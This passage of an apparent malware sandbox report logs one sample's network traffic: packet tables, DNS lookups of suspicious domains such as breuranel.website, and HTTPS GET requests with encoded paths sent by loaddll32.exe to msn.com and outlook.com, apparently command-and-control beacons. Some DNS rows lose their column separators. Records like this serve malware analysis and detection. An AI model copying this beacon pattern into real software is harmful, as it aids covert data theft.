Oct 12, 2021 00:37:50.071388006 CEST | 443 | 49784 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:50.071779013 CEST | 443 | 49784 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:50.074706078 CEST | 49784 | 443 | 192.168.2.3 | 40.97.153.146
Oct 12, 2021 00:37:50.115148067 CEST | 443 | 49784 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:50.185472012 CEST | 443 | 49784 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:50.185564995 CEST | 443 | 49784 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:50.185678959 CEST | 49784 | 443 | 192.168.2.3 | 40.97.153.146
Oct 12, 2021 00:37:50.185892105 CEST | 49784 | 443 | 192.168.2.3 | 40.97.153.146
Oct 12, 2021 00:37:50.185910940 CEST | 443 | 49784 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:50.213552952 CEST | 49785 | 443 | 192.168.2.3 | 52.97.223.66
Oct 12, 2021 00:37:50.213602066 CEST | 443 | 49785 | 52.97.223.66 | 192.168.2.3
Oct 12, 2021 00:37:50.214442968 CEST | 49785 | 443 | 192.168.2.3 | 52.97.223.66
Oct 12, 2021 00:37:50.214493990 CEST | 49785 | 443 | 192.168.2.3 | 52.97.223.66
Oct 12, 2021 00:37:50.214505911 CEST | 443 | 49785 | 52.97.223.66 | 192.168.2.3
Oct 12, 2021 00:37:50.317359924 CEST | 443 | 49785 | 52.97.223.66 | 192.168.2.3
Oct 12, 2021 00:37:50.318341970 CEST | 49785 | 443 | 192.168.2.3 | 52.97.223.66
Oct 12, 2021 00:37:50.321649075 CEST | 49785 | 443 | 192.168.2.3 | 52.97.223.66
Oct 12, 2021 00:37:50.321666002 CEST | 443 | 49785 | 52.97.223.66 | 192.168.2.3
Oct 12, 2021 00:37:50.322053909 CEST | 443 | 49785 | 52.97.223.66 | 192.168.2.3
Oct 12, 2021 00:37:50.333874941 CEST | 49785 | 443 | 192.168.2.3 | 52.97.223.66
Oct 12, 2021 00:37:50.363312960 CEST | 443 | 49785 | 52.97.223.66 | 192.168.2.3
Oct 12, 2021 00:37:50.363456964 CEST | 443 | 49785 | 52.97.223.66 | 192.168.2.3
Oct 12, 2021 00:37:50.364072084 CEST | 49785 | 443 | 192.168.2.3 | 52.97.223.66
Oct 12, 2021 00:37:50.364095926 CEST | 49785 | 443 | 192.168.2.3 | 52.97.223.66
Oct 12, 2021 00:37:50.364113092 CEST | 443 | 49785 | 52.97.223.66 | 192.168.2.3
Oct 12, 2021 00:37:50.364121914 CEST | 49785 | 443 | 192.168.2.3 | 52.97.223.66
Oct 12, 2021 00:37:50.364129066 CEST | 443 | 49785 | 52.97.223.66 | 192.168.2.3
Oct 12, 2021 00:37:50.390655041 CEST | 49786 | 443 | 192.168.2.3 | 52.97.151.2
Oct 12, 2021 00:37:50.390702963 CEST | 443 | 49786 | 52.97.151.2 | 192.168.2.3
Oct 12, 2021 00:37:50.390820026 CEST | 49786 | 443 | 192.168.2.3 | 52.97.151.2
Oct 12, 2021 00:37:50.391333103 CEST | 49786 | 443 | 192.168.2.3 | 52.97.151.2
Oct 12, 2021 00:37:50.391355038 CEST | 443 | 49786 | 52.97.151.2 | 192.168.2.3
Oct 12, 2021 00:37:50.495934010 CEST | 443 | 49786 | 52.97.151.2 | 192.168.2.3
Oct 12, 2021 00:37:50.496045113 CEST | 49786 | 443 | 192.168.2.3 | 52.97.151.2
Oct 12, 2021 00:37:50.498070955 CEST | 49786 | 443 | 192.168.2.3 | 52.97.151.2
Oct 12, 2021 00:37:50.498089075 CEST | 443 | 49786 | 52.97.151.2 | 192.168.2.3
Oct 12, 2021 00:37:50.498500109 CEST | 443 | 49786 | 52.97.151.2 | 192.168.2.3
Oct 12, 2021 00:37:50.501807928 CEST | 49786 | 443 | 192.168.2.3 | 52.97.151.2
Oct 12, 2021 00:37:50.543143034 CEST | 443 | 49786 | 52.97.151.2 | 192.168.2.3
Oct 12, 2021 00:37:50.554900885 CEST | 443 | 49786 | 52.97.151.2 | 192.168.2.3
Oct 12, 2021 00:37:50.554985046 CEST | 443 | 49786 | 52.97.151.2 | 192.168.2.3
Oct 12, 2021 00:37:50.555134058 CEST | 49786 | 443 | 192.168.2.3 | 52.97.151.2
Oct 12, 2021 00:37:50.555485010 CEST | 49786 | 443 | 192.168.2.3 | 52.97.151.2
Oct 12, 2021 00:37:50.555505991 CEST | 443 | 49786 | 52.97.151.2 | 192.168.2.3
Oct 12, 2021 00:37:50.555547953 CEST | 49786 | 443 | 192.168.2.3 | 52.97.151.2
Oct 12, 2021 00:37:50.555557013 CEST | 443 | 49786 | 52.97.151.2 | 192.168.2.3
Oct 12, 2021 00:37:52.904436111 CEST | 49787 | 443 | 192.168.2.3 | 40.97.153.146
Oct 12, 2021 00:37:52.904473066 CEST | 443 | 49787 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:52.904546976 CEST | 49787 | 443 | 192.168.2.3 | 40.97.153.146
Oct 12, 2021 00:37:52.905592918 CEST | 49787 | 443 | 192.168.2.3 | 40.97.153.146
Oct 12, 2021 00:37:52.905608892 CEST | 443 | 49787 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:53.226494074 CEST | 443 | 49787 | 40.97.153.146 | 192.168.2.3
Oct 12, 2021 00:37:53.226619005 CEST | 49787 | 443 | 192.168.2.3 | 40.97.153.146
Oct 12, 2021 00:37:54.148821115 CEST | 49787 | 443 | 192.168.2.3 | 40.97.153.146

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 12, 2021 00:37:08.106329918 CEST | 56009 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:08.126542091 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:37:08.982853889 CEST | 59026 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:10.273961067 CEST | 49572 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:10.294186115 CEST | 53 | 49572 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:37:10.977236986 CEST | 52130 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:29.591995001 CEST | 63297 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:29.614368916 CEST | 53 | 63297 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:37:32.060544014 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:32.083794117 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:37:49.723500013 CEST | 53777 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:49.744034052 CEST | 53 | 53777 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:37:50.192079067 CEST | 57106 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:50.211678028 CEST | 53 | 57106 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:37:50.371407986 CEST | 60352 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:50.389377117 CEST | 53 | 60352 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:37:52.881088972 CEST | 56773 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:52.902503967 CEST | 53 | 56773 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:37:54.267306089 CEST | 60982 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:54.286405087 CEST | 53 | 60982 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:37:54.433736086 CEST | 58058 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:37:54.451898098 CEST | 53 | 58058 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:38:11.003211975 CEST | 51539 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:38:11.024405956 CEST | 53 | 51539 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:38:14.975621939 CEST | 50585 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:38:14.995378017 CEST | 53 | 50585 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:38:31.045994043 CEST | 56706 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:38:31.065346956 CEST | 53 | 56706 | 8.8.8.8 | 192.168.2.3
Oct 12, 2021 00:38:35.020976067 CEST | 53569 | 53 | 192.168.2.3 | 8.8.8.8
Oct 12, 2021 00:38:35.039261103 CEST | 53 | 53569 | 8.8.8.8 | 192.168.2.3

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Oct 12, 2021 00:37:35.330707073 CEST | 192.168.2.3 | 8.8.8.8 | d034 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 12, 2021 00:37:08.106329918 CEST | 192.168.2.3 | 8.8.8.8 | 0x7c2a | Standard query (0) | msn.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:08.982853889 CEST | 192.168.2.3 | 8.8.8.8 | 0x5fc0 | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:10.273961067 CEST | 192.168.2.3 | 8.8.8.8 | 0x6bc8 | Standard query (0) | msn.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:10.977236986 CEST | 192.168.2.3 | 8.8.8.8 | 0x690b | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:29.591995001 CEST | 192.168.2.3 | 8.8.8.8 | 0x7abc | Standard query (0) | breuranel.website | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:32.060544014 CEST | 192.168.2.3 | 8.8.8.8 | 0xe37 | Standard query (0) | breuranel.website | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:49.723500013 CEST | 192.168.2.3 | 8.8.8.8 | 0xddc7 | Standard query (0) | outlook.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:50.192079067 CEST | 192.168.2.3 | 8.8.8.8 | 0x4023 | Standard query (0) | www.outlook.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:50.371407986 CEST | 192.168.2.3 | 8.8.8.8 | 0xbc64 | Standard query (0) | outlook.office365.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:52.881088972 CEST | 192.168.2.3 | 8.8.8.8 | 0x6e73 | Standard query (0) | outlook.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:54.267306089 CEST | 192.168.2.3 | 8.8.8.8 | 0x65f | Standard query (0) | www.outlook.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:54.433736086 CEST | 192.168.2.3 | 8.8.8.8 | 0x55b2 | Standard query (0) | outlook.office365.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:38:11.003211975 CEST | 192.168.2.3 | 8.8.8.8 | 0x2b8b | Standard query (0) | areuranel.website | A (IP address) | IN (0x0001)
Oct 12, 2021 00:38:14.975621939 CEST | 192.168.2.3 | 8.8.8.8 | 0x66e7 | Standard query (0) | areuranel.website | A (IP address) | IN (0x0001)
Oct 12, 2021 00:38:31.045994043 CEST | 192.168.2.3 | 8.8.8.8 | 0xdc09 | Standard query (0) | msn.com | A (IP address) | IN (0x0001)
Oct 12, 2021 00:38:35.020976067 CEST | 192.168.2.3 | 8.8.8.8 | 0x9ff6 | Standard query (0) | msn.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 12, 2021 00:37:08.126542091 CEST | 8.8.8.8 | 192.168.2.3 | 0x7c2a | No error (0) | msn.com | - | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:09.004950047 CEST | 8.8.8.8 | 192.168.2.3 | 0x5fc0 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:37:10.294186115 CEST | 8.8.8.8 | 192.168.2.3 | 0x6bc8 | No error (0) | msn.com | - | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:10.481112003 CEST | 8.8.8.8 | 192.168.2.3 | 0xdf1e | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:37:10.996918917 CEST | 8.8.8.8 | 192.168.2.3 | 0x690b | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:37:29.614368916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7abc | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:32.083794117 CEST | 8.8.8.8 | 192.168.2.3 | 0xe37 | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:49.744034052 CEST | 8.8.8.8 | 192.168.2.3 | 0xddc7 | No error (0) | outlook.com | - | 40.97.153.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:49.744034052 CEST | 8.8.8.8 | 192.168.2.3 | 0xddc7 | No error (0) | outlook.com | - | 40.97.116.82 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:49.744034052 CEST | 8.8.8.8 | 192.168.2.3 | 0xddc7 | No error (0) | outlook.com | - | 40.97.148.226 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:49.744034052 CEST | 8.8.8.8 | 192.168.2.3 | 0xddc7 | No error (0) | outlook.com | - | 40.97.161.50 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:49.744034052 CEST | 8.8.8.8 | 192.168.2.3 | 0xddc7 | No error (0) | outlook.com | - | 40.97.156.114 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:49.744034052 CEST | 8.8.8.8 | 192.168.2.3 | 0xddc7 | No error (0) | outlook.com | - | 40.97.160.2 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:49.744034052 CEST | 8.8.8.8 | 192.168.2.3 | 0xddc7 | No error (0) | outlook.com | - | 40.97.128.194 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:49.744034052 CEST | 8.8.8.8 | 192.168.2.3 | 0xddc7 | No error (0) | outlook.com | - | 40.97.164.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:37:50.211678028 CEST | 8.8.8.8 | 192.168.2.3 | 0x4023 | No error (0) | www.outlook.com | outlook.office365.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:37:50.211678028 CEST | 8.8.8.8 | 192.168.2.3 | 0x4023 | No error (0) | outlook.office365.com | outlook.ha.office365.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:37:50.211678028 CEST | 8.8.8.8 | 192.168.2.3 | 0x4023 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:37:50.211678028 CEST | 8.8.8.8 | 192.168.2.3 | 0x4023 | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:37:50.211678028 CEST | 8.8.8.8 | 192.168.2.3 | 0x4023 | No error (0) | HHN-efz.ms-acdc.office.com | - | 52.97.223.66 | A (IP address) | IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST8.8.8.8192.168.2.30x4023No error (0)HHN-efz.ms-acdc.office.com52.97.218.66A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST8.8.8.8192.168.2.30x4023No error (0)HHN-efz.ms-acdc.office.com52.98.208.18A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST8.8.8.8192.168.2.30x4023No error (0)HHN-efz.ms-acdc.office.com52.97.147.2A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)FRA-efz.ms-acdc.office.com52.97.151.2A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)FRA-efz.ms-acdc.office.com52.97.151.34A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)FRA-efz.ms-acdc.office.com40.101.124.18A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)FRA-efz.ms-acdc.office.com52.97.135.82A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)FRA-efz.ms-acdc.office.com52.97.178.34A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)FRA-efz.ms-acdc.office.com52.97.151.18A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)FRA-efz.ms-acdc.office.com40.101.60.226A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)FRA-efz.ms-acdc.office.com52.97.162.2A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)FRA-efz.ms-acdc.office.com40.101.61.130A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:11.024405956 CEST8.8.8.8192.168.2.30x2b8bName error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:14.995378017 CEST8.8.8.8192.168.2.30x66e7Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:31.065346956 CEST8.8.8.8192.168.2.30xdc09No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:35.039261103 CEST8.8.8.8192.168.2.30x9ff6No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)

HTTP Request Dependency Graph

• msn.com
• outlook.com
• www.outlook.com
• outlook.office365.com

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49754 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:37:08 UTC | 0 | OUT | GET /mail/liopolo/881KeBhik38/n4I3jisQrsLf3N/5T7WW0TVyqLiEqrYpioXw/gsBY_2B0auYDQzqy/fq_2B0_2B1d5s1X/dE8U_2Bi9e1uHEa_2F/5gbQOA71j/4SGjjTuSnP5G5SL6XFKB/ya3reo77Dd0XJ5txbLh/Z2Jzwc_2FxPLynamqWy_2B/SzxjiUxPyCdZ8/5vaLjUU_/2FbRmdxDVJSYut_2BRUXs8y/S.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com
2021-10-11 22:37:08 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/881KeBhik38/n4I3jisQrsLf3N/5T7WW0TVyqLiEqrYpioXw/gsBY_2B0auYDQzqy/fq_2B0_2B1d5s1X/dE8U_2Bi9e1uHEa_2F/5gbQOA71j/4SGjjTuSnP5G5SL6XFKB/ya3reo77Dd0XJ5txbLh/Z2Jzwc_2FxPLynamqWy_2B/SzxjiUxPyCdZ8/5vaLjUU_/2FbRmdxDVJSYut_2BRUXs8y/S.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 22:37:08 GMT
Connection: close
Content-Length: 383
2021-10-11 22:37:08 UTC | 0 | IN | Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/881KeBhik38/n4I3jisQrsLf3N/5T7WW0TVyqLiEqrYpioXw/gsBY_2B0auYDQzqy/fq_2B0_2B1d5s1X/dE8U_2Bi9e1uHEa_2F/5gbQOA71j/4SGjj


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49756 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:37:10 UTC | 1 | OUT | GET /mail/liopolo/I2vyCwQZ_2BZdOw7_2FC5/QHqYyNs8nTjA1r7w/N6UkSzFGkH0f_2F/1IQh_2Bz24bnmMcZ4_/2BpWpgK6a/MfYXdR3sp4DYLa3d1zd1/q_2BesRlkaXfNl4zUpH/oAvtXyz6Z7BEsY_2FVEEFG/s2tbS3iXa95no/TNlgDymJ/mAsry_2BV2k9xkYk3dzUg9O/zullnql4G3/M32YonxJQXyLafjIm/_2FKjkdabgYHJ/uSKzerPj.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com
2021-10-11 22:37:10 UTC | 1 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/I2vyCwQZ_2BZdOw7_2FC5/QHqYyNs8nTjA1r7w/N6UkSzFGkH0f_2F/1IQh_2Bz24bnmMcZ4_/2BpWpgK6a/MfYXdR3sp4DYLa3d1zd1/q_2BesRlkaXfNl4zUpH/oAvtXyz6Z7BEsY_2FVEEFG/s2tbS3iXa95no/TNlgDymJ/mAsry_2BV2k9xkYk3dzUg9O/zullnql4G3/M32YonxJQXyLafjIm/_2FKjkdabgYHJ/uSKzerPj.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 22:37:10 GMT
Connection: close
Content-Length: 406
2021-10-11 22:37:10 UTC | 2 | IN | Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/I2vyCwQZ_2BZdOw7_2FC5/QHqYyNs8nTjA1r7w/N6UkSzFGkH0f_2F/1IQh_2Bz24bnmMcZ4_/2BpWpgK6a/MfYXdR3sp4DYLa3d1zd1/q_2BesRlkaX


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49784 | 40.97.153.146 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:37:50 UTC | 2 | OUT | GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.com
2021-10-11 22:37:50 UTC | 3 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://www.outlook.com/signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre
Server: Microsoft-IIS/10.0
request-id: 5b359089-5bcb-778b-068a-f71f7fea54b7
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: BN6PR2001CA0010
X-RequestId: 2de1b3ec-5903-416c-884b-1bb5ba991823
MS-CV: iZA1W8tbi3cGivcff+pUtw.0
X-Powered-By: ASP.NET
X-FEServer: BN6PR2001CA0010
Date: Mon, 11 Oct 2021 22:37:49 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49785 | 52.97.223.66 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:37:50 UTC | 3 | OUT | GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: www.outlook.com
2021-10-11 22:37:50 UTC | 4 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://outlook.office365.com/signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre
Server: Microsoft-IIS/10.0
